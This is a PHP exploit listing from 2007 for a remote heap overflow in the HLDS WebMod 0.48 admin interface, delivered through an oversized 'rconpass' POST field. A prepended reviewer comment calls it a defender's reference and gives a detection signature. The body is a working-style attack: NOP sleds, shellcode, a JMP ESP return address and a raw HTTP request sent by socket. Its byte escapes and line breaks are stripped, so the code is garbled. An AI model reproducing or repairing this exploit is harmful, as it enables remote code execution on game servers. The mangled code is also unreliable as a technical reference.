
hlds-heap.txt

Posted on 06 May 2008

<?php
# NOTE(review): historical (2007) proof-of-concept listing for a heap overflow in the
# HLDS WebMod 0.48 admin interface, reached through the `rconpass` field of a POST to
# /auth.w. Kept as a defender's reference: the observable signature is a POST to
# /auth.w whose rconpass value is roughly 16 KB (the header quotes "A"x16444) of
# mostly filler, and the affected interface should not be reachable from untrusted
# networks.
# The listing is not runnable as extracted: the backslashes of the "\x.." byte escapes
# (e.g. "x66x83xC0x04xFFxE0" for the ADD EAX,4 / JMP EAX stub) and, apparently, the
# CRLF terminators of the hand-built HTTP request have been stripped, and the original
# line breaks were collapsed, so everything after the open tag on the following line
# is parsed as one "#" comment and the continuation line no longer forms a valid
# statement. Left byte-for-byte as found; do not "repair" it.
## HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit ## Tested on HLDS Launcher 4.1.1.1, WebMod 0.48, Windows XP SP2 Hebrew ## shir, skod.uk [at] gmail [dot] com ## 17/12/2007 ## Registers (rconpass = "A"x16444): # EAX 67E04955 w_mm.67E04955 # ECX 41414141 # EDX 41414141 # EBX 0000000A # ESP 08F650FC # EBP 08F726D4 # ESI 08F72734 # EDI 00000000 # EIP 67E0498C w_mm.67E0498C ######### error_reporting(7); ini_set("max_execution_time",0); if($_SERVER['argv'][1] && $_SERVER['argv'][2]) { $host = $_SERVER['argv'][1]; $port = $_SERVER['argv'][2]; } else { echo (" HLDS WebMod 0.48 Remote Heap Overflow Exploit "); echo ("Written by shir, skod.ukx40gmailx2Ecom "); echo ("Usage: php {$_SERVER['argv'][0]} IP PORT "); echo ("Example: php {$_SERVER['argv'][0]} 192.168.0.100 27015 "); exit(); } echo "[~] Packing... "; $scode = "x66x83xC0x04xFFxE0"; /*ADD EAX, 4 => JMP EAX*/ # win32_bind - Calc executer. Metasploit.com $shellcode = "x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xf4". "x47xbaxa4x83xebxfcxe2xf4x08xafxfexa4xf4x47x31xe1". "xc8xccxc6xa1x8cx46x55x2fxbbx5fx31xfbxd4x46x51xed". "x7fx73x31xa5x1ax76x7ax3dx58xc3x7axd0xf3x86x70xa9". "xf5x85x51x50xcfx13x9exa0x81xa2x31xfbxd0x46x51xc2". "x7fx4bxf1x2fxabx5bxbbx4fx7fx5bx31xa5x1fxcexe6x80". "xf0x84x8bx64x90xccxfax94x71x87xc2xa8x7fx07xb6x2f". "x84x5bx17x2fx9cx4fx51xadx7fxc7x0axa4xf4x47x31xcc". "xc8x18x8bx52x94x11x33x5cx77x87xc1xf4x9cxb7x30xa0". "xabx2fx22x5ax7ex49xedx5bx13x24xdbxc8x97x47xbaxa4"; $evilcode = str_repeat("x90", 100); $evilcode.= $shellcode; $evilcode.= str_repeat("x90", 16156-(strlen($shellcode))); $evilcode.= "xFDxAFx6Ax07"; #076AAFFD FFE4 => JMP ESP (cstrikedllsmp.dll) $evilcode.= str_repeat("x90", 60-(strlen($scode))); $evilcode.= $scode; $evilcode.= str_repeat("x90", 8); $evilcode.= str_repeat("0", 72); $evilcode.= str_repeat("%00", 4); $evilcode.= str_repeat("0", 4); $evilcode.= "x20xF0xFDx7F"; #Windows PEB Lock Pointer $evilcode.= str_repeat("%00", 8); $post = "rconpass=" . $evilcode . 
"&setcookiesNULL=rconpass"; $pack = "POST /auth.w?redir= HTTP/1.1 "; $pack.= "Host: {$host}:{$port} "; $pack.= "User-Agent: Mozilla/5.0 "; $pack.= "Accept: */* "; $pack.= "Accept-Language: en-us,en;q=0.5 "; $pack.= "Accept-Encoding: gzip,deflate "; $pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 "; $pack.= "Keep-Alive: 300 "; $pack.= "Connection: keep-alive "; $pack.= "Content-Type: application/x-www-form-urlencoded "; $pack.= "Content-Length: ". strlen($post) ." " . $post; echo "[~] Sending... "; $sock = @fsockopen($host, $port, $errno, $errstr, 10); if ($errstr) echo("[-] Can't connect {$host}:{$port} "); else { fputs($sock, $pack); $tmp = fgets($sock,1024); if(strstr($tmp, '<')) echo "[-] Failed, you better try again. "; else echo "[+] Shellcode should be executed. "; fclose($sock); } ?>

 
